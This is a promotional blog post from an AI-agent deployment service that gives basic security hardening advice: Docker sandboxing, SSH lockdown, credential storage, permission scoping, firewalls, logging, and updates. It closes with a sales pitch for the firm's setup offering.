Last month a founder got hacked because his AI agent had root access to an unsandboxed server. API keys sat in a plaintext .env file. No Docker. No firewall rules. Someone found an exposed port at 4 AM.
Six hours to clean up. Every credential rotated. Production rebuilt from backup.
This happens more often than anyone admits. So here's the security guide I wish every AI agent deployer would read before they connect anything to their business.
Start With Docker. Always.
Your AI agent should never run directly on your host machine. Ever.
Docker containers provide process isolation. If your agent gets compromised or starts executing unexpected commands, the damage stays inside the container. Your host system, your files, your other services stay untouched.
The basic setup:
- Run your agent inside a Docker container with limited permissions
- Mount only the specific directories the agent needs (not your entire filesystem)
- Set memory and CPU limits so a runaway process can't take down your server
- Use Docker's built-in networking to restrict which services the agent can reach
If Docker feels like overkill for your setup, it's not. The hour you spend configuring it saves you the 6-hour cleanup when something goes wrong.
SSH Hardening
If your agent runs on a remote server (and it probably should), SSH is your front door. Lock it down.
- Disable password authentication. Keys only.
- Change the default SSH port. Reduces automated scanning noise by 95%.
- Set up fail2ban. After 3 failed login attempts, that IP gets blocked for 24 hours.
- Disable root login over SSH. Use a regular user account with sudo when needed.
- Keep your SSH keys encrypted with a passphrase.
None of this is optional. If you're running an AI agent on a server accessible via SSH with default settings, you're one brute-force attack away from a bad day.
Credential Management
This is where most people mess up.
API keys in .env files are fine for development. In production, they're a liability. Anyone who gains access to your filesystem can read every API key, every OAuth token, every secret your agent uses.
Better approaches:
- Use encrypted credential storage (OpenClaw's SecretRef system handles this natively)
- Rotate API keys on a schedule. Monthly minimum.
- Use scoped API keys wherever possible. Your email agent doesn't need write access to your billing system.
- Never commit credentials to git. Not even private repos. Use .gitignore religiously.
- Set up alerts for unusual API key usage patterns.
Permission Scoping
Your AI agent should have the minimum permissions needed to do its job. Nothing more.
If the agent reads email and manages calendar, it doesn't need shell access. If it manages your CRM, it doesn't need access to your source code. If it handles customer support, it doesn't need your financial data.
Every extra permission is an extra attack surface. Keep it tight.
OpenClaw supports granular tool permissions. Use them. Disable every tool your agent doesn't actively need. You can always enable them later.
Network Security
Your agent's server should not have every port open. This sounds obvious, but you'd be surprised.
- Close every port except the ones you explicitly need
- Use a firewall (UFW on Ubuntu is straightforward)
- If your agent only communicates with specific services, whitelist those IPs
- Monitor outbound connections. If your agent starts calling IP addresses it shouldn't, that's a red flag.
Monitoring and Logging
You can't secure what you can't see.
- Log every command your agent executes
- Log every API call it makes
- Set up alerts for unusual patterns (high volume API calls, new IP connections, file system changes)
- Review logs weekly at minimum
- Keep logs for at least 90 days
When something goes wrong (and eventually something will), logs are the difference between a 30-minute fix and a 6-hour mystery.
The Update Discipline
Keep everything updated. OpenClaw, your OS, Docker, Node.js, every dependency.
Security patches exist for a reason. The vulnerability they fix was discovered, which means attackers know about it too.
Set up automatic security updates for your OS. For OpenClaw, check for updates weekly. For Docker images, rebuild monthly.
What We Do Differently
When OpenClaw Setup deploys an agent, roughly 40% of our time goes to security configuration. That's not overhead. That's the job.
Every deployment gets: Docker sandboxing, SSH hardening, encrypted credential storage, permission scoping, firewall configuration, fail2ban, and monitoring setup.
It's not glamorous. Clients don't get excited about firewall rules. But it's the reason our clients sleep at night.
If you've already deployed an agent and skipped the security steps, it's not too late. Go back and do them now. Today. Before something happens.
And if you want someone who's done this 50+ times to handle it for you: book a call.
OpenClaw Setup deploys, configures, and secures AI agents for businesses. One-time $999 setup. Security included. Get started.